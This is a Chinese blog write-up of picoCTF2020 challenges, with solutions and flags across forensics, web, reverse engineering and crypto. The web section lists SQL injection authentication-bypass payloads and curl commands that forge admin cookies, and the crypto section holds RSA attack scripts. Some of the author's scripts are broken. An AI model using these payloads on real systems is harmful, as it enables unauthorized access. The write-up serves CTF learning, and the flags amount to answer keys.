picoCTF2020
煤矿路口西 Lv3

Forensics


Glory of the Garden

DL3wl9

What is a hex editor?

根据hint,拖进winhex,最后可得flag.

shark on wire 1

shark on wire 1

Try using a tool like Wireshark;What are streams?

追踪UDP流,得flag。(MISC-AboutWireshark.md里编写了类似的思路)

How do operating systems know what kind of file it is? (It’s not just the ending!Make sure to submit the flag as picoCTF{XXXXX}

直接打开是一txt文件,观察可指为png的文件格式,更改后缀名可得flag.

So Meta

So Meta

What does meta mean in the context of files?Ever heard of metadata?

同第一题,Winhex打开搜索关键词得flag.

What Lies Within

buildings

There is data encoded somewhere… there might be an online decoder.

图片隐写在线网站可得,工具get

I stopped using YellowPages and moved onto WhitePages… but the page they gave me is all blank!

#coding=utf-8
text='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      '
firstType = ' '
secondType = ' '
binaryString = ''

for char in text: #Foreach char
if char == firstType: #Check if it is the first type
binaryString += '0' #Mark it as 0
else:
binaryString += '1' #Mark it as 1

print(binaryString) #Print result

m00nwalk2

MISC-audio.md 中有提及。

like1000

[like1000](This .tar file got tarred a lot.)

Try and script this, it’ll save you a lot of time

import tarfile
for i in range(1000,1,-1):
filename=str(i)+'.tar'
tar=tarfile.open(filename)
tar.extractall()
tar.close

WebNet0

学到一招,更新在(MISC-AboutWireshark.md 中)

Web Exploitation


How do you inspect web code on a browser?There’s 3 parts

ctrl+u看源码->1/3 of the flag: picoCTF{tru3_d3

mycss.css看源码-> 2/3 of the flag: t3ct1ve_0r_ju5t

myjs.js看源码->3/3 of the flag: _lucky?2e7b23e3}

What part of the website could tell you where the creator doesn’t want you to look?

提到robots,输入/robots.txt

得👇

User-agent: *
Disallow: /1bb4c.html

输入/1bb4c.html 得flag.

Never trust the client

看源码

function verify() {
checkpass = document.getElementById("pass").value;
split = 4;
if (checkpass.substring(0, split) == 'pico') {
if (checkpass.substring(split*6, split*7) == '706c') {
if (checkpass.substring(split, split*2) == 'CTF{') {
if (checkpass.substring(split*4, split*5) == 'ts_p') {
if (checkpass.substring(split*3, split*4) == 'lien') {
if (checkpass.substring(split*5, split*6) == 'lz_b') {
if (checkpass.substring(split*2, split*3) == 'no_c') {
if (checkpass.substring(split*7, split*8) == '5}') {
alert("Password Verified")
}
}
}

}
}
}
}
}
else {
alert("Incorrect password");
}

}

读代码,根据下标拼接flag。

Hmm it doesn’t seem to check anyone’s password, except for logon’s?

根据提示,用logon登录后,什么都没有。但EditThisCookie中观察,多了admin的选项,将admin由False改为True后,加锁,加路径后,刷新即可得flag。👇

logon

What is obfuscation?

Can cookies help you to get the flag?

了解了传COOKIES的另一种方式:

curl "https://jupiter.challenges.picoctf.org/problem/51400/" -H "Cookie:admin=True;time=1400;" -s

以及

grep picoCTF

来搜索关键词。

You don’t need to download a new web browser

curl --user-agent "picobrowser" "https://jupiter.challenges.picoctf.org/problem/13759/flag" | grep picoCTF

得flag所在的那一行。

There doesn’t seem to be many ways to interact with this. I wonder if the users are kept in a database?Try to think about how the website verifies your login.

由这道题了解到了网络后台的万能密码,

"or "a"="a

')or('a'='a

or 1=1--

'or 1=1--

a'or' 1=1--

"or 1=1--

'or'a'='a

"or"="a'='a

'or''='

'or'='or'

1 or '1'='1'=1

1 or '1'='1' or 1=1

'OR 1=1

"or 1=1

'xor

简单来说就是在自己需要传输的命令后添加一个恒为真的值来保证执行。学到了。 由此可知该题可输入的命令为

debug=1&password=&username=admin' or '1'=='1
username: admin' or '1'=='1
password:
SQL query: SELECT * FROM users WHERE name='admin' or '1'=='1' AND password=''

得到flag.

The password is being filtered.

debug=1&password=1&username=admin'--
username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'

Seems like the password is encrypted.

尝试

debug=1&password=adsf

发现回显

password: adsf
SQL query: SELECT * FROM admin where password = 'nqfs'

与输入不同,可知该程序对输入值进行了某种加密。观察可得为ROT13解码,故我们可以通过ROT13加密的方式传入我们的命令。

debug=1&password=' BE '1'='1

password: ' BE '1'='1
SQL query: SELECT * FROM admin where password = '' OR '1'='1'

得flag.

Reverse Engineering


vault-door-training

[vault-door-training](Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java)

The password is revealed in the program’s source code.

读脚本即可解。

String input = userInput.substring("picoCTF{".length(),userInput.length()-1);

public boolean checkPassword(String password) {
return password.equals("w4rm1ng_Up_w1tH_jAv4_3808d338b46");
}

vault-door-1

[vault-door-1](This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here: VaultDoor1.java)

Look up the charAt() method online.

根据数组下标依次串联可得flag。

vault-door-3

[vault-door-3](This vault uses for-loops and byte arrays. The source code for this vault is here: VaultDoor3.java)

Make a table that contains each value of the loop variables and the corresponding buffer index that it writes to.

public boolean checkPassword(String password) {
if (password.length() != 32) {
return false;
}
char[] buffer = new char[32];
int i;
for (i=0; i<8; i++) {
buffer[i] = password.charAt(i);
}
for (; i<16; i++) {
buffer[i] = password.charAt(23-i);
}
for (; i<32; i+=2) {
buffer[i] = password.charAt(46-i);
}
for (i=31; i>=17; i-=2) {
buffer[i] = password.charAt(i);
}
String s = new String(buffer);
return s.equals("jU5t_a_sna_3lpm12g94c_u_4_m7ra41");
}

理解脚本逻辑,明确

-密文长度为32位

-依次取s中的对应位数

-串联得flag

vault-door-4

[vault-door-4](This vault uses ASCII encoding for the password. The source code for this vault is here: VaultDoor4.java)

Use a search engine to find an “ASCII table”. You will also need to know the difference between octal, decimal, and hexadecimal numbers.

public boolean checkPassword(String password) {
byte[] passBytes = password.getBytes();
byte[] myBytes = {
106 , 85 , 53 , 116 , 95 , 52 , 95 , 98 ,
0x55, 0x6e, 0x43, 0x68, 0x5f, 0x30, 0x66, 0x5f,
0142, 0131, 0164, 063 , 0163, 0137, 0146, 064 ,
'a' , '8' , 'c' , 'd' , '8' , 'f' , '7' , 'e' ,
};
for (int i=0; i<32; i++) {
if (passBytes[i] != myBytes[i]) {
return false;
}
}
return true;
}

依次对数组中的数据进行处理,分别为ASCII,十六进制,八进制与原字母,串联得flag.

vault-door-5

[vault-door-5](In the last challenge, you mastered octal (base 8), decimal (base 10), and hexadecimal (base 16) numbers, but this vault door uses a different change of base as well as URL encoding! The source code for this vault is here: VaultDoor5.java)

You may find an encoder/decoder tool helpful, such as https://encoding.tools/;Read the wikipedia articles on URL encoding and base 64 encoding to understand how they work and what the results look like.

public String urlEncode(byte[] input) {
StringBuffer buf = new StringBuffer();
for (int i=0; i<input.length; i++) {
buf.append(String.format("%%%2x", input[i]));
}
return buf.toString();
}
public boolean checkPassword(String password) {
String urlEncoded = urlEncode(password.getBytes());
String base64Encoded = base64Encode(urlEncoded.getBytes());
String expected = "JTYzJTMwJTZlJTc2JTMzJTcyJTc0JTMxJTZlJTY3JTVm"
+ "JTY2JTcyJTMwJTZkJTVmJTYyJTYxJTM1JTY1JTVmJTM2"
+ "JTM0JTVmJTM4JTM0JTY2JTY0JTM1JTMwJTM5JTM1";
return base64Encoded.equals(expected);
}

将expected中得字符串联后,base64解密后,URL解密得flag。

vault-door-6

[vault-door-6](This vault uses an XOR encryption scheme. The source code for this vault is here: VaultDoor6.java)

If X ^ Y = Z, then Z ^ Y = X. Write a program that decrypts the flag based on this fact.

根据HINT,可知该题与异或有关,转二进制后编写脚本(以下为笔者的辣鸡脚本)

modetext='01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010'
plaintext='0011101101100101001000011010000000111000000000000011011000011101101000000011110101100001001001110001000101100110001001111010000000100001000111010110000100111011101000000010110101100101001001111010000001100110001101100011000001100111011011000110010001101100'
plain=plaintext.replace(' ', '')
mode=modetext.replace(' ','')
print(mode)
new=''
for i in range(0,len(plain)):
if(plain[i]=='0'):
new += mode[i]
elif(plain[i]=='1'):
new += str(1-int(mode[i]))
print(new)
print(plain)

二进制转字符后得flag.

vault-door-7

[vault-door-7](This vault uses bit shifts to convert a password string into an array of integers. Hurry, agent, we are running out of time to stop Dr. Evil’s nefarious plans! The source code for this vault is here: VaultDoor7.java)

Use a decimal/hexadecimal converter such as this one: https://www.mathsisfun.com/binary-decimal-hexadecimal-converter.html;You will also need to consult an ASCII table such as this one: https://www.asciitable.com/

笔者的脚本

x=0
x[0] =1096770097
x[1] =1952395366
x[2] =1600270708
x[3] =1601398833
x[4] =1716808014
x[5] =1734293296
x[6] =842413104
x[7] =1684157793
before=''
for i in range(0,8):
before[i]=x[i*4]>>24|x[i*4+1]>>16|x[i*4+2]>>8|x[i*4+3]
print(before)

做了一连串RE题之后对编写脚本和逆向增加了一定的了解。挺好。

General Skills


2Warm

[2Warm]

Can you convert the number 42 (base 10) to binary (base 2)?

十进制42转二进制,在线网站即可。

Warmed Up

[Warmed Up]

What is 0x3D (base 16) in decimal (base 10)?

十六进制转十进制,同上

Lets Warm Up

[Lets Warm Up]

If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?

十六进制转ASCII,同上

*strings it *

[strings it ]

Can you find the flag in file without running it?

执行命令

strings XXX | grep picoCTF

得关键词。

Bases

[Bases]

What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.

Base一把梭寻找可能字符串。

First Grep

[First Grep]

Can you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way.

直接打开可得flag.

what’s a net cat?

[what’s a net cat?]

Using netcat (nc) is going to be pretty important. Can you connect to jupiter.challenges.picoctf.org at port 29138 to get the flag?

nc jupiter.challenges.picoctf.org 29138

plumbing

[plumbing]

Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to jupiter.challenges.picoctf.org 22058.

nc jupiter.challenges.picoctf.org 22058 |grep picoCTF

同前题

Based

[Based]

To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc jupiter.challenges.picoctf.org 9670.

# nc jupiter.challenges.picoctf.org 9670
Let us see how data is stored
pie
Please give the 01110000 01101001 01100101 as a word.
...
you have 45 seconds.....

Input:
pie
Please give me the 163 157 143 153 145 164 as a word.
Input:
socket
Please give me the 636f6c6f7261646f as a word.
Input:
colorado
You've beaten the challenge
Flag: picoCTF{learning_about_converting_values_b375bb16}

二进制八进制十六进制转换。

mus1c

[mus1c](I wrote you a song. Put it in the picoCTF{} flag format.)

Do you think you can master rockstar?

Pico's a CTFFFFFFF
my mind is waitin
It's waitin

Put my mind of Pico into This
my flag is not found
put This into my flag
put my flag into Pico


shout Pico
shout Pico
shout Pico

My song's something
put Pico into This

Knock This down, down, down
put This into CTF

shout CTF
my lyric is nothing
Put This without my song into my lyric
Knock my lyric down, down, down

shout my lyric

Put my lyric into This
Put my song with This into my lyric
Knock my lyric down

shout my lyric

Build my lyric up, up ,up

shout my lyric
shout Pico
shout It

Pico CTF is fun
security is important
Fun is fun
Put security with fun into Pico CTF
Build Fun up
shout fun times Pico CTF
put fun times Pico CTF into my song

build it up

shout it
shout it

build it up, up
shout it
shout Pico

根据hint搜索rockstar,得一在线网站,解密得

114
114
114
111
99
107
110
114
110
48
49
49
51
114
Program completed in 361 ms

转ASCII得flag.

1_wanna_b3_a_r0ck5tar

[1_wanna_b3_a_r0ck5tar]

I wrote you another song. Put the flag in the picoCTF{} flag format

上题的方法失败读脚本通过

Rocknroll is right              
Silence is wrong
A guitar is a six-string

等,猜测为类似伪代码,更改运行可得flag.

Cryptography


The Numbers

The Numbers

The flag is in the format PICOCTF{}

得到一串数字

16 9 3 15 3 20 6 { 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 }

根据hint,对照ASCII,已知部门为

80 73 67 79 67 84 70 { }

编写脚本,思路为after=before+64,或者手动加工也可得到flag.

caesar

caesar

caesar cipher tutorial

在线网站或者脚本都可解密,遍历后选取相对有意思的字符即是flag.

Easy1

Easy1

The one time pad can be cryptographically secure, but not when you know the key. Can you solve this? We’ve given you the encrypted flag, key, and a table to help UFJKXQZQUNB with the key of SOLVECRYPTO. Can you use this table to solve it?.

Submit your answer in our flag format. For example, if your answer was ‘hello’, you would submit ‘picoCTF{HELLO}’ as the flag.Please use all caps for the message.

据题意,已知该加密方式拥有明文和密钥,结合给出的字典,确定为维吉尼亚编码,在线网站或脚本都可解密得flag。

13

[13](Cryptography can be easy, do you know what ROT13 is? cvpbPGS{abg_gbb_onq_bs_n_ceboyrz})

This can be solved online if you don’t want to do it by hand!

题目描述可知加密方式为ROT13,在线网站或脚本即可解密。

la cifra de

[la cifra de](I found this cipher in an old book. Can you figure out what it says? Connect with nc jupiter.challenges.picoctf.org 50523)

There are tools that make this easy.Perhaps looking at history will help

Encrypted message:
Ne iy nytkwpsznyg nth it mtsztcy vjzprj zfzjy rkhpibj nrkitt ltc tnnygy ysee itd tte cxjltk

Ifrosr tnj noawde uk siyyzre, yse Bnretèwp Cousex mls hjpn xjtnbjytki xatd eisjd

Iz bls lfwskqj azycihzeej yz Brftsk ip Volpnèxj ls oy hay tcimnyarqj dkxnrogpd os 1553 my Mnzvgs Mazytszf Merqlsu ny hox moup Wa inqrg ipl. Ynr. Gotgat Gltzndtg Gplrfdo

Ltc tnj tmvqpmkseaznzn uk ehox nivmpr g ylbrj ts ltcmki my yqtdosr tnj wocjc hgqq ol fy oxitngwj arusahje fuw ln guaaxjytrd catizm tzxbkw zf vqlckx hizm ceyupcz yz tnj fpvjc hgqqpohzCZK{m311a50_0x_a1rn3x3_h1ah3x6kp60egf}

Ehk ktryy herq-ooizxetypd jjdcxnatoty ol f aordllvmlbkytc inahkw socjgex, bls sfoe gwzuti 1467 my Rjzn Hfetoxea Gqmexyt.

Tnj Gimjyèrk Htpnjc iy ysexjqoxj dosjeisjd cgqwej yse Gqmexyt Doxn ox Fwbkwei Inahkw.

Tn 1508, Ptsatsps Zwttnjxiax tnbjytki ehk xz-cgqwej ylbaql rkhea (g rltxni ol xsilypd gqahggpty) ysaz bzuri wazjc bk f nroytcgq nosuznkse ol yse Bnretèwp Cousex.

Gplrfdo’y xpcuso butvlky lpvjlrki tn 1555 gx l cuseitzltoty ol yse lncsz. Yse rthex mllbjd ol yse gqahggpty fce tth snnqtki cemzwaxqj, bay ehk fwpnfmezx lnj yse osoed qptzjcs gwp mocpd hd xegsd ol f xnkrznoh vee usrgxp, wnnnh ify bk itfljcety hizm paim noxwpsvtydkse.

在线网站维吉尼亚解密可得flag.

词频分析搞了半天,555

rsa-pop-quiz

[rsa-pop-quiz](Class, take your seats! It’s PRIME-time for a quiz… nc jupiter.challenges.picoctf.org 41130)

RSA info

RSA层层解密:

# nc jupiter.challenges.picoctf.org 41130
Good morning class! It's me Ms. Adleman-Shamir-Rivest
Today we will be taking a pop quiz, so I hope you studied. Cramming just will not do!
You will need to tell me if each example is possible, given your extensive crypto knowledge.
Inputs and outputs are in decimal. No hex here!
#### NEW PROBLEM ####
q : 60413
p : 76753
##### PRODUCE THE FOLLOWING ####
n
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
n: 4636878989
Outstanding move!!!


#### NEW PROBLEM ####
p : 54269
n : 5051846941
##### PRODUCE THE FOLLOWING ####
q
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
q: 93089
Outstanding move!!!


#### NEW PROBLEM ####
e : 3
n : 12738162802910546503821920886905393316386362759567480839428456525224226445173031635306683726182522494910808518920409019414034814409330094245825749680913204566832337704700165993198897029795786969124232138869784626202501366135975223827287812326250577148625360887698930625504334325804587329905617936581116392784684334664204309771430814449606147221349888320403451637882447709796221706470239625292297988766493746209684880843111138170600039888112404411310974758532603998608057008811836384597579147244737606088756299939654265086899096359070667266167754944587948695842171915048619846282873769413489072243477764350071787327913
##### PRODUCE THE FOLLOWING ####
q
p
IS THIS POSSIBLE and FEASIBLE? (Y/N):n
Outstanding move!!!


#### NEW PROBLEM ####
q : 66347
p : 12611
##### PRODUCE THE FOLLOWING ####
totient(n)
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
totient(n): 836623060
Outstanding move!!!


#### NEW PROBLEM ####
plaintext : 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717
e : 3
n : 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331
##### PRODUCE THE FOLLOWING ####
ciphertext
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
ciphertext: 256931246631782714357241556582441991993437399854161372646318659020994329843524306570818293602492485385337029697819837182169818816821461486018802894936801257629375428544752970630870631166355711254848465862207765051226282541748174535990314552471546936536330397892907207943448897073772015986097770443616540466471245438117157152783246654401668267323136450122287983612851171545784168132230208726238881861407976917850248110805724300421712827401063963117423718797887144760360749619552577176382615108244813
Outstanding move!!!


#### NEW PROBLEM ####
ciphertext : 107524013451079348539944510756143604203925717262185033799328445011792760545528944993719783392542163428637172323512252624567111110666168664743115203791510985709942366609626436995887781674651272233566303814979677507101168587739375699009734588985482369702634499544891509228440194615376339573685285125730286623323
e : 3
n : 27566996291508213932419371385141522859343226560050921196294761870500846140132385080994630946107675330189606021165260590147068785820203600882092467797813519434652632126061353583124063944373336654246386074125394368479677295167494332556053947231141336142392086767742035970752738056297057898704112912616565299451359791548536846025854378347423520104947907334451056339439706623069503088916316369813499705073573777577169392401411708920615574908593784282546154486446779246790294398198854547069593987224578333683144886242572837465834139561122101527973799583927411936200068176539747586449939559180772690007261562703222558103359
##### PRODUCE THE FOLLOWING ####
plaintext
IS THIS POSSIBLE and FEASIBLE? (Y/N):n
Outstanding move!!!


#### NEW PROBLEM ####
q : 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559
p : 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637
e : 65537
##### PRODUCE THE FOLLOWING ####
d
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
d: 1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729
Outstanding move!!!


#### NEW PROBLEM ####
p : 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433
ciphertext : 18031488536864379496089550017272599246134435121343229164236671388038630752847645738968455413067773166115234039247540029174331743781203512108626594601293283737392240326020888417252388602914051828980913478927759934805755030493894728974208520271926698905550119698686762813722190657005740866343113838228101687566611695952746931293926696289378849403873881699852860519784750763227733530168282209363348322874740823803639617797763626570478847423136936562441423318948695084910283653593619962163665200322516949205854709192890808315604698217238383629613355109164122397545332736734824591444665706810731112586202816816647839648399
e : 65537
n : 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239
##### PRODUCE THE FOLLOWING ####
plaintext
IS THIS POSSIBLE and FEASIBLE? (Y/N):y
#### TIME TO SHOW ME WHAT YOU GOT! ###
plaintext: picoCTF{wA8_th4t$_ill3aGal..ode01e4bb}
That's not an int! Exiting

Tapping

[Tapping](Theres tapping coming in from the wires. What’s it saying nc jupiter.challenges.picoctf.org 28927.)

What kind of encoding uses dashes and dots?The flag is in the format PICOCTF{}

摩斯电码解密。

Mr-Worldwide

[Mr-Worldwide](A musician left us a message. What’s it mean?)

坐标,百度可查找经纬度,提取城市首字母得flag.

Flags

[Flags](What do the flags mean?)

The flag is in the format PICOCTF{}

简单的替换密码,百度找到对应网站和图片即可。https://en.wikipedia.org/wiki/International_maritime_signal_flags

waves over lambda

[waves over lambda](We made a lot of substitutions to encrypt this. Can you decrypt it? Connect with nc jupiter.challenges.picoctf.org 1981.)

Flag is not in the usual flag format

同为词频分析,观察后猜测jgsk=flag,丢进在线网站求解得flag.

miniRSA

miniRSA

RSA tutorial;How could having too small an e affect the security of this 2048 bit key?Make sure you don’t lose precision, the numbers are pretty big (besides the e value)

from Crypto.Util.number import *
import gmpy2

N=29331922499794985782735976045591164936683059380558950386560160105740343201513369939006307531165922708949619162698623675349030430859547825708994708321803705309459438099340427770580064400911431856656901982789948285309956111848686906152664473350940486507451771223435835260168971210087470894448460745593956840586530527915802541450092946574694809584880896601317519794442862977471129319781313161842056501715040555964011899589002863730868679527184420789010551475067862907739054966183120621407246398518098981106431219207697870293412176440482900183550467375190239898455201170831410460483829448603477361305838743852756938687673
e=3
c=2205316413931134031074603746928247799030155221252519872650080519263755075355825243327515211479747536697517688468095325517209911688684309894900992899707504087647575997847717180766377832435022794675332132906451858990782325436498952049751141
m = int(gmpy2.iroot(c, e)[0])
print(long_to_bytes(m))
print(m)
#b'picoCTF{n33d_a_lArg3r_e_d0cd6eae}'
#13016382529449106065894479374027604750406953699090365388203722801043052339225981

b00tl3gRSA2

[b00tl3gRSA2](In RSA d is a lot bigger than e, why don’t we use d to encrypt instead of e? Connect with nc jupiter.challenges.picoctf.org 42900.)

What is e generally?

nc后发现e很大,维纳攻击脚本:

import  RSAwienerHacker
c=67725484828660171155495211630497256983804750771405173604915475315285337259554745019946599487641055680169265457644340938264529723371169972500050850583888499676593738216542714158045211992126456724042909731789545505279795504523037528761238149430515678580782074452909931229053012113137701929175885390372056497999
n=92908556262738254094065441172814586106067369443369499189214986491976931561738844273516700957530563178532708425726354645373760924007923816005398578319882528611540185427918571906094044173194388663365364134997826444445816336765012006409280712402476371185929572990909183399977560298360727962550970347800300222711
e=69520159460585947518483836148643582831918423640590763549444035011978832519891224565191960240113848478143117452571748866357688968863765140502139873387990270685914837356707507222866135679527601234329281217279226396840073020368275802208410100769859080342284164663788369069928003055037897805163984210272130270657
d = RSAwienerHacker.hack_RSA(e,n)
if d:
print(d)
#import hashlib
import binascii
#flag =hashlib.md5(hex(d)).hexdigest()
#print flag
m=pow(c,d,n)
print(hex(m))

十六进制转字符串后得明文。

john_pollard

[john_pollard](Sometimes RSA certificates are breakable)

The flag is in the format picoCTF{p,q};Try swapping p and q if it does not work

  • 本文标题:picoCTF2020
  • 本文作者:煤矿路口西
  • 创建时间:2021-03-22 20:43:25
  • 本文链接:http://www.mklkx.xyz/2021/03/22/picoCTF2020/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!